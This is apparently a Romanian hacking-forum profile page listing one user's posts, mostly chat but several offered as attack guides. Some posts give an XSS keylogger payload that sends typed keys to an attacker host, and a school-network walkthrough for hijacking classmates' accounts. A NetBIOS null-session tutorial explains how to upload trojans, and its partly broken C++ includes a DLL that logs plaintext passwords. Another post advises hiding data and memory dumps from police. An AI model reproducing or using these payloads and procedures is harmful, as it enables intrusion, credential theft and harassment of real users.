Jump to content

Screech

Active Members
  • Posts

    503
  • Joined

  • Last visited

    Never

Everything posted by Screech

  1. <div class='quotetop'>QUOTE("edededi")</div> Nu are legatura cu scam-ul, e de la host. Intra pe mess, mancam si nu aveam timp sa-ti explic.
  2. <div class='quotetop'>QUOTE("Andrei")</div> Tunde iarba . Nu sunt eu ala care sa zic search pe google dar uneori mai trebuie s-o faci. Omu ti-a zis esentialul "Troian destul de bun. " altceva ce mai vrei? uita-te pe google si o sa ai prilejul de a te bucura de o priveliste cu totul si cu totul deosebita.
  3. <div class='quotetop'>QUOTE("!_30")</div> Si tu ai loc pe undeva prin camera?
  4. <div class='quotetop'>QUOTE("koltzu")</div> Ai un of cu el, ce topic se face repede: "kw3rln tu nu pui...??"
  5. Screech

    CNP vostru

    Cea mai tare faza pe ziua de azi. Acum fac si eu un topic: Baga-ti un dinte aici, dar unu real.
  6. Phuaaa, acum o trag si eu, thanks.
  7. <div class='quotetop'>QUOTE("phantomas")</div> ba tu ai ceva cu varamea )) ii cam faci ochi dulci , ia zi te combin ?? [/quote:a19b7b4f8a] Imediat ce ma tund si ma fac frumos intram pestea ea
  8. Nup, nu ti-a iesit bine.
  9. Barbatu fatal: Aproximativ: 1,77/86/caprui/large (penisul )/saten. Rog a nu sari toata lumea pe mine, chiar daca sunt perfect... va rog frumos nu exagerati!
  10. Eu: Marlanu Gagica (varasa lu phantomas ): Iepuras si am format trasniti in nato
  11. <div class='quotetop'>QUOTE("SpiridusuCaddy")</div> Iar gluma asta de peste?
  12. 18 ani
  13. L-am tradus: OK. Asta este ce fac la scoala asa ca daca-ti place....nu vei fi prins. Prima data, Vreau sa-ti zic ca nu sunt responsabil ptr ce vei face cu aceasta informatie. (CE FRIER ) Pasul unu: Deschide command prompt. Daca vezi pe cineva pe care nu-l placi (vei vedea sigur ), incearca sa nu uiti numele PC-ului. Pasul doi: In Command Prompt, tasteaza "nbtstat -a <numele PC-ului>" (inlocuieste <numele PC-ului> cu numele PC-ului in care vrei sa intri) si apasa Enter. Daca comanda a reusit, vei putea vedea un tabel cu multe informatii. Doar uita-te dupa o parte cu un username si pe langa el, cu un text care contine "USER". Pasul trei: Daca ai monitorizat scriptul de login din reteaua ta trebuie sa cunosti numele computer-ului si directoarele ale userului in PC-ul carui te afli. aici este o comanda care te conecteaza la contul "net use x : computernamedirectoryusername" Te rog noteaza.. nu este mereu un director. Acum ai acces total ptr. a le modifica contul. Doar uita-te... esti un admin mic acum. I have just barely avoided expulsion. Pasul patru: Acum cand ai terminat de editat contul lor si ai setat backgroundul de genul.. gay porn etc, deconecteaza-te.. Ca sa faci asta , deschide My Computersi du-te catre x: driver (sau orice ai setat tu drive account). Click dreapta si du-te la "Disconnect". Daca nu te-ai disconectat contul va ramane linked to yours pana te vei disconecta. Maine daca am timp poate le traduc si pe celalate.
  14. L-am tradus: Mai intai, o sa va dau codul ptr. injectie, dupa care va voi explica pas cu pas cum merge treaba. <body onload=key="" onkeypress=if(event.which){key=key+String.fromCharCode(event.which)}else{key=key+String.fromCharCode(event.keyCode) onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie="> Este un tag body, asa ca orice este pus in body, in primul rand orice dupa pagina, va fi logat. Cand pagina o sa fie incarcata, va initializa variabila "key".(cheia variabila) Cand o keye va fi apasata, poti afla cand browserul foloseste evenimentul. .care (netscape-compatible) sau evenimentul.keyCode (IE compatible) si va converti valorile ASCII de la keya apasata la carecterul sau , atunci se va adauga la sfarsitul variabilei key. Cand pagina nu este incarcata (asta este, fereastra browser-ul este inchisa sau o noua pagina este in proces de incaracare, trimite browser-ul intr-o alta locatie, namely your logging program.
  15. <div class='quotetop'>QUOTE("ENCODED")</div> Muuaaa ma terra care esti , m-ai inebunit cu asta micul al tau... e vreo gluma din aia gen aia lu Caddy? Din alea luate de pe camp?
  16. <div class='quotetop'>QUOTE("Fatal1ty")</div> Sau poate nu mergem la facultate
  17. <div class='quotetop'>QUOTE("Fatal1ty")</div> Da daca el nu vine? De ce nu vi fara el?
  18. this is a article about my ghost script for mirc its for all thse ppl who are to stupid or so lazzy to make it them selfes. its realy simple it consists out of 1 on join command and 1 on nick command <code> on *:join:#: { if ($me != <nick>) && ($nick == <nick>) { msg nickserv ghost <nick> <password> | halt } else { halt } } on *:nick: { if ($me == $nick) || ($me == $newnick) { halt } else { if ($newnick == <nick>) { msg nickserv ghost <nick> <password> | halt } else { halt } } } </code> isn't that simple? the bad part is if you are not on the channel where that persone changes his nick or if he doesn't join a channel where your on then it doesn't work you can also use it for several nicks <code> on *:join:#: { if ($me != <nick>) && ($nick == <nick>) { msg nickserv ghost <nick> <password> | halt } if ($me != <nick2>) && ($nick == <nick2>) { msg nickserv ghost <nick2> <password> | halt } else { halt } } on *:nick: { if ($me == $nick) || ($me == $newnick) { halt } else { if ($newnick == <nick>) { msg nickserv ghost <nick> <password> | halt } if ($newnick == <nick2>) { msg nickserv ghost <nick2> <password> | halt } else { halt } } } </code> and also for several servers <code> on *:join:#: { if ($serverip == 65.110.54.117) { ;begin stuff for HTS server if ($me != <nick>) && ($nick == <nick>) { msg nickserv ghost <nick> <password> } if ($me != <nick2>) && ($nick == <nick2>) { msg nickserv ghost <nick2> <password> } halt } ;end stuff for HTS server if ($serverip == 81.96.242.132) { ;begin stuff other server if ($me != <nick3>) && ($nick == <nick3>) { msg nickserv ghost <nick3> <password> } halt ;end stuff other server } else { halt } } on *:nick: { if ($me == $nick) || ($me == $newnick) { halt } else { if ($serverip == 65.110.54.117) { ;begin stuff for HTS server if ($newnick == <nick>) { msg nickserv ghost <nick> <password> } if ($newnick == <nick2>) { msg nickserv ghost <nick2> <password> } halt } ;end stuff for HTS server if ($serverip == 81.96.242.132) { ;begin stuff for other server if ($newnick == <nick3>) { msg nickserv ghost <nick3> <password> } halt } ;end stuff for other server else { halt } } } </code> Gata, nu mai am, acum le-am gasit si eu si le-am citit, mi s-au parut interesante si le-am postat.
  19. Intro: Before I begin let me say that the following techniques only applies to Windows (sorry). What you need in order to follow the steps I'm about to describe: one external hard drive, one USB flash drive, a program called Sentry 2020 [1], Windows XP, and some common sense. First I'll outline the basic steps from a theoretical standpoint and the go into detail. There may be other programs out there like Sentry 2020, but this is the best one I've come across for this so far. Basics: What we're going to do is create a virtual drive (called a data file by Sentry so I may interchange the two terms) on our external hard drive. All of our private information should be stored in the virtual drive on our external hard drive. The data file will require an encryption key to decrypt all of the data stored in it before we can see it. Sentry provides us with 10 encryption algorithms ranging from 56 bit all the way up to 1024 bit. The key will be password-protected and we will chose to store it on our USB flash drive. This will make it impossible to access the files on our external hard drive without inserting they USB drive. Obviously, you do not want to leave this USB drive near your computer when you don't need to access these files. I suggest keeping it with you at all times (it's small so it can easily fit in your pocket), so that in the unfortunate event that authorities (or anyone for that matter) try to access your drive they will have no way of decrypting or reading the files on your external drive. Specifics: Now we shall dive into the details of doing what I just described. First open Sentry and click the three dots next to the entry field labeled "Key File" to create your encryption key. Make sure you store this on the USB drive. Next, chose where your data file will go. Remember, this is the virtual drive that will hold all of your files so I'd recommend putting this on your external hard drive [3]. I think it would be wise to use maximum capacity on your external hard drive for the data file because someone may come up with a vulnerability for Sentry in the future that allows someone to gain access to the data file if they have access to the unencrypted space on the same drive. Plus, if you underestimate your storage needs and you need more space than you allowed yourself at some future point in time, you will have to resize they data file which erases everything in it at the time of the change. (Technically I think you have to delete the virtual drive and creating a new one with a bigger size.) Now it's time to chose your algorithm of choice and set your password. Use some common sense here: no easily guess able passwords! Choose your drive letter; nothing to really consider here as it's just a personal preference. And finally, set the timeout. I assume this means it will disconnect after a certain amount of minutes of inactivity, but I am unable to test this because I don't have any files large enough to take a an exorbitant amount of time transferring. Don't set this value too high because that would be a security risk. Don't make it read-only at first because Windows will need to format it the first time you mount it, and it needs write access to do this. If you're really paranoid go ahead and make the data file read-only whenever you mount it as long as you don't need to put any new files in it. Other Security Precautions: 1. Make sure you don't have any viruses, keyloggers, or spyware on your computer because we wouldn't want anyone to know the password we chose. 2. One of the pitfalls of any encryption scheme is that in order to decrypt something your key or passphrase must be loaded into memory. To keep the feds from obtaining a RAM dump from your machine turn off automatic memory dumping and delete any dumps on your system. To do so: right click on My Computer > Properties > Advance > Startup and Recovery Settings > Write debugging information and set it to "none." Delete %SystemRoot%Memory.dmp to remove the last memory dump. Get rid of any memory dumps that occurred automatically upon receiving the infamous Blue Screen of Death by deleting the folder %SystemRoot%Minidump [4]. 3. As you should know, using the Recycle Bin does not get rid of files permanently! They can still be recovered. To remedy this I recommend wiping the free space on any of your hard drives (with multiple passes) weekly. Many free utilities exist that do this for you. 4. Delete your paging file (sometimes called a swap file) when you shutdown your computer. To do so: click Start and select Run; type "regedit" (sans the quotes) and push enter. Navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management and change (Right click on it and select Modify) ClearPageFileAtShutdown to 1 (binary for true) [5]. Extention (for the really paranoid): One technique for added security I thought of one day is creating a data file within a data file. This can be repeated several times [6]. Just make sure that when you create a virtual drive within another virtual drive that you make the second data file slightly smaller in size than the one it's created in [7]. For each data file use a different algorithm in order to slow anyone down that's trying to crack into your secret stash. More importantly, use a different password for each level in your hierarchy (i.e. primary, secondary, and tertiary data files). Make sure you dismount every virtual drive before closing Sentry! In my testing I was still able to access a file inside of a data file that was in another data file, which in turn was inside yet another data file after dismounting the highest level virtual drive and exiting Sentry. Sources and Footnotes: [1] http://www.softwinter.com/ Free to try; $50 to purchase. [2] I use a PQI Intelligent Stick 2.0 (512 MB, about $55). [3] If you don't have an external hard drive you may use the internal one in your computer, a zip drive, a floppy, or another USB drive; the only real requirement here is that your storage medium is large enough to hold whatever you want protected. The same goes for the USB drive: it may be replaced by a floppy or CD or something similar, but both of those options are harder to safely and comfortably transport. [4] 2600: The Hacker Quarterly Volume 21, Number 3, Page 8-9. [5] http://www.tweakxp.com/tweak31.aspx [6] Note: Windows was unable to format a 2MB data file I created within a 5MB data file, which was in turn created inside of a 10MB file. I went with the default NTFS setting for the 5MB and 10MB virtual drives and didn't experience a problem; when I tried using NTFS for the 2MB volume I got an error, but Windows correctly formatted the 2MB data file using FAT. [7] Note: Don't try to access the data file directly by clicking on its icon; use the shortcut to it that was created in My Computer for you.
  20. <div class='quotetop'>QUOTE("nos")</div> phuaaaa Looooooooooooooooooooooo0000000000000L
  21. Well..first of all hello folks.. In this tutorial I wanna show u how to hack via NetBios. And here is what u need: - Windows ( for the method I'll explain here ) - Internet - NetBIOS scans - the good old DOS console - a bit knowledge about DOS and nbtstat.exe and net.exe ( see microsoft technet for description ) - knowledge about trojans or backdoors ( how they work...) ************************************************************************************ Lets start... 1. Fire up a DOS box 2. Now go to root ( usually c: ) and enter " nbtstat -A IP " ( without " ", IP is the IP of the remote PC. You get the IP's from your scans ) If the server/PC is hackable the result should be a table like this: NetBIOS Remote Machine Name Table Name Type Status -------------------------------------------- computername <00> UNIQUE Registered workgroupname <00> GROUP Registered computername <20> UNIQUE Registered workgroupname <1E> GROUP Registered workgroupname <1D> UNIQUE Registered ..__MSBROWSE__. <01> GROUP Registered MAC Address = xx-xx-xx-xx-xx-xx ( the x's are hex numbers ) ************************************************************************************ You can scan for NetBios with X-Scan. Also scan with a port scanner like superscan (available at www.packetstormsecurity.nl) 'cause port 135-139 often stands for NetBios. An original scan wit X-Scan could look like: xxx.xxx.xxx.xxx Administrator - [built-in account for administering the computer/domain] Account type: Administrator Password age: 291 Day 10 Hour 28 Minute 34 Sec. Bad password count: 0Number logons: 9 Last logon: GMT Wed Aug 14 15:26:38 2002 Guest - [built-in account for guest access to the computer/domain] Account type: Guest Password age: 0 Day 0 Hour 0 Minute 0 Sec. Bad password count: 0Number logons: 0 ************************************************************************************ 3. Mkay now enter this in the DOS box: ( you have to replace the xxx.... by the IP of the target and dont write the c: 'cause it is there yet ) c:net view xxx.xxx.xxx.xxx Response (possible): System error 5 occured. Access denied. c: ooops...wasn't as easy as we thought...well ok type: c:net use xxx.xxx.xxx.xxxipc$ "" /user:"" ( this creates a zero session ) Response: The command completed successfully. Ok..lets test it again... c:net view xxx.xxx.xxx.xxx Response: Shared resources on xxx.xxx.xxx.xxx * Here it displays the resources mkay...now we know the shared resources Now we assign a drive to a shared folder... c:net use m: xxx.xxx.xxx.xxx"folder" ( replace "folder" by a shared folders name ) Response: The command completed successfully. Now we switch to our new drive: c:m: ..usually nothing interesting in a shared folder. And because of that... 4. Now we can upload a trojan who gives us access to rest of the PC. It's good to code a small trojan that does all what we want, because existing trojans are recognized by AV tools. But u can also take an existing one like BO2k ... Now upload: m:copy c:path_to_the_trojan_here m: Now the trojan is installed. Best thing is to upload a dll-trojan thru the other trojan that replaces a *.dll 5. Now we close the connection to the remote folder with: c:net use m: /DELETE ****************************************************************************************** ****************************************************************************************** ********************** C++ source for this shit to save time **************************** ****************************************************************************************** ****************************************************************************************** ********************* Perhaps you have to edit it at several lines *********************** ****************************************************************************************** #include <windows.h> #include <stdio.h> #include <stdlib.h> struct UNI_STRING { USHORT len; USHORT maxlen; WCHAR *buff; }; static HANDLE fh; BOOLEAN __stdcall InitializeChangeNotify () { DWORD wrote; fh = CreateFile("C:WINNTtemppwdchange.tmp", GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH, 0); WriteFile(fh, "InitializeChangeNotify gestartedn", 31, &wrote, 0); return TRUE; } LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid, struct UNI_STRING *passwd) { DWORD wrote; WCHAR wbuf[200]; char buf[512]; char buf1[200]; DWORD len; memcpy(wbuf, user->buff, user->len); len = user->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "User = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); memcpy(wbuf, passwd->buff, passwd->len); len = passwd->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "p4sswd = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); sprintf(buf, "RID = %xn", rid); WriteFile(fh, buf, strlen(buf), &wrote, 0); return 0L; } BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg) { char* pTemp = TargetHost.GetBuffer(256); WCHAR wszServ[256]; LPWSTR Server = NULL; //convert to unicode MultiByteToWideChar(CP_ACP, 0, pTemp, strlen(pTemp)+1, wszServ, sizeof(wszServ)/sizeof(wszServ[0]) ); Server = wszServ; LPCWSTR szIpc = L"IPC$"; WCHAR RemoteResource[UNCLEN + 5 + 1]; DWORD dwServNameLen; DWORD dwRC; NET_API_STATUS nas; USE_INFO_2 ui2; SHARE_INFO_1* pSHInfo1 = NULL; DWORD dwEntriesRead; DWORD dwTotalEntries; HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot; char sharename[256]; char remark[256]; if(Server == NULL || *Server == L'') { SetLastError(ERROR_INVALID_COMPUTERNAME); return FALSE; } dwServNameLen = lstrlenW( Server ); if(Server[0] != L''&& Server[1] != L'') { RemoteResource[0] = L''; RemoteResource[1] = L''; RemoteResource[2] = L''; } else { dwServNameLen -= 2; RemoteResource[0] = L''; } if(dwServNameLen >CNLEN) { SetLastError(ERROR_INVALID_COMPUTERNAME); return FALSE; } if(lstrcatW(RemoteResource, Server) == NULL) return FALSE; if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE; ZeroMemory(&ui2, sizeof(ui2)); ui2.ui2_local = NULL; ui2.ui2_remote = (LPTSTR) RemoteResource; ui2.ui2_asg_type = USE_IPC; ui2.ui2_password = (LPTSTR) L""; ui2.ui2_username = (LPTSTR) L""; ui2.ui2_domainname = (LPTSTR) L""; nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL); dwRC = GetLastError(); if( nas == NERR_Success ) { machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT); } nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1, MAX_PREFERRED_LENGTH, &dwEntriesRead, &dwTotalEntries, NULL); dwRC = GetLastError(); if( nas == NERR_Success ) { if(dwTotalEntries > 0) { shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot,TVI_LAST); userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST); adminRoot = pDlg->m_Victims.InsertItem("Admin", machineRoot,TVI_LAST); } for(int x=0; x<(int)dwTotalEntries; x++) { WideCharToMultiByte(CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_netname, -1, sharename, 256, NULL, NULL ); WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1, remark, 256, NULL, NULL ); CString ShareDetails = sharename; ShareDetails = ShareDetails + " - " + remark; attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST); pSHInfo1++; } } DoNetUserEnum(Server, pDlg, userRoot, adminRoot); nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0); TargetHost.ReleaseBuffer(); SetLastError( nas ); return FALSE; } bool GetAdmin(char* pServer, char* pUser, CString& Name) { BOOL fAdmin = FALSE; DWORD dwDomainName,dwSize,dwAdminVal; SID_NAME_USE use; PSID pUserSID = NULL; // SID für Benutzer int rc; int iSubCount; bool bFoundHim = 0; dwDomainName = 256; dwSize = 0; dwAdminVal = 0; iSubCount = 0; rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); rc = GetLastError(); if(rc == ERROR_INSUFFICIENT_BUFFER) { pUserSID = (PSID) malloc(dwSize); rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); } iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID)); dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1)); if(dwAdminVal==500) { Name.Format("Admin is %s%s ", szDomainName, pUser); bFoundHim = true; } delete pUserSID; return bFoundHim; } void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot) { USER_INFO_10 *pUserbuf, *pCurUser; DWORD dwRead, dwRemaining, dwResume, dwRC; char userName[256]; char userServer[256]; dwResume = 0; if(pServer[0] != L'' && pServer[1] != L'') { RemoteResource[0] = L''; RemoteResource[1] = L''; RemoteResource[2] = L''; } else { dwServNameLen -= 2; RemoteResource[0] = L''; } if(dwServNameLen > CNLEN) { SetLastError(ERROR_INVALID_COMPUTERNAME); return; } if(lstrcatW(RemoteResource, pServer) == NULL) return; do { pUserbuf = NULL; dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf, 1024, &dwRead, &dwRemaining, &dwResume); if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS) break; DWORD i; for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser) { WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1, userName, 256, NULL, NULL ); WideCharToMultiByte( CP_ACP, 0, pServer, -1, userServer, 256, NULL, NULL ); if(!GotAdmin) { CString Admin; GotAdmin = GetAdmin(userServer, userName, Admin); if(GotAdmin { Admin.TrimRight(); HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST); pDlg->m_Victims.EnsureVisible(adminChild); } } CString strUserName = userName; pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST); } if (pUserbuf != NULL) NetApiBufferFree(pUserbuf); } while (dwRC == ERROR_MORE_DATA); if (dwRC != ERROR_SUCCESS) printf("NUE() returned %lu ", dwRC); } *************************************************************************************** Some NetBios hacking tools: DumpSec http://www.somarsoft.com Windows NT/2000 Legion http://www.technotronic.com Windows 9x/NT/2000, UNIX/Linux NAT http://www.packetstormsecurity.nl Windows 9x/NT, UNIX/Linux **************************************************************************************** Congratulation...you've hacked him now u can connect him with http://FTP.
  22. OK. This is what I do at school so just do it like this and you should not get caught. First of all, I would like to tell you that I am in NO way responcible for what you do with this information and nor is HackThisSite.org Step One: Open command prompt. If you see someone you dont like, try to remember the computer name that they are at. Step Two: In Command Prompt, type "nbtstat -a <computer Name>" (replace <computer Name with the computer name ofc) and hit Enter. If the command is successful, you should see a table appearing with a lot of information. just look for a part with a username and across from it, a piece of text saying "USER". Step Three: If you have monitored the login scripts on your network you should know the computer name and directory the usernames are in. Heres the command that connects to the account "net use x: computernamedirectoryusername" Please note that there is not always a directory. Now you have full access to modify their account. Just watch out if you have a smart administrator, I have just barely avoided expulsion. Step Four: Now when you have finished editing their account and setting their background as gay porn etc, you disconnect. To do this, open My Computer and go to the x: drive (or what ever you set the account drive as). Right click it and go to "Disconnect". If you do not disconnect, the account will remain linked to yours until you disconnect.
  23. XSS attacks are often looked at as puny or ineffective, being only a matter of being able to steal cookies, or pop up annoying boxes. You can also rewrite certain values in the HTML DOM. But XSS attacks are even more dangerous than that, and this is a perfect example of how. First, I will give you the code to inject, then I will explain it step by step. <body onload=key="" onkeypress=if(event.which){key=key+String.fromCharCode(event.which)}else{key=key+String.fromCharCode(event.keyCode) onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie="> It's a body tag, so whatever in the body is typed in, essentially anything on the page, will be logged. When the page loads, it initializes the variable "key". When a key is pressed, it finds whether the browser uses event.which (netscape-compatible) or event.keyCode (IE compatible) and converts the ASCII value of the key pressed to its character, then adds it to the end of the variable "key". When the page is unloaded (that is, the browser window is closed or a new page is loaded, it sends the browser to a new location, namely your logging program.
  24. A inceput sa-mi placa de Nemesis . Il duce capu nu gluma, mi-am facut si eu cont, ca nu se stie niciodata cum am nevoie si nu mai gasesc ceva mai smecher liber [ www.geocities.com/enter.html ]
  25. Cu capu asta mare a meu. m-am gandit ca dupa ce ne strangem unde am zis sa merge la paintball , ce spuneti va consumati 300 mii ca sa facem putin pe counter-striki?
×
×
  • Create New...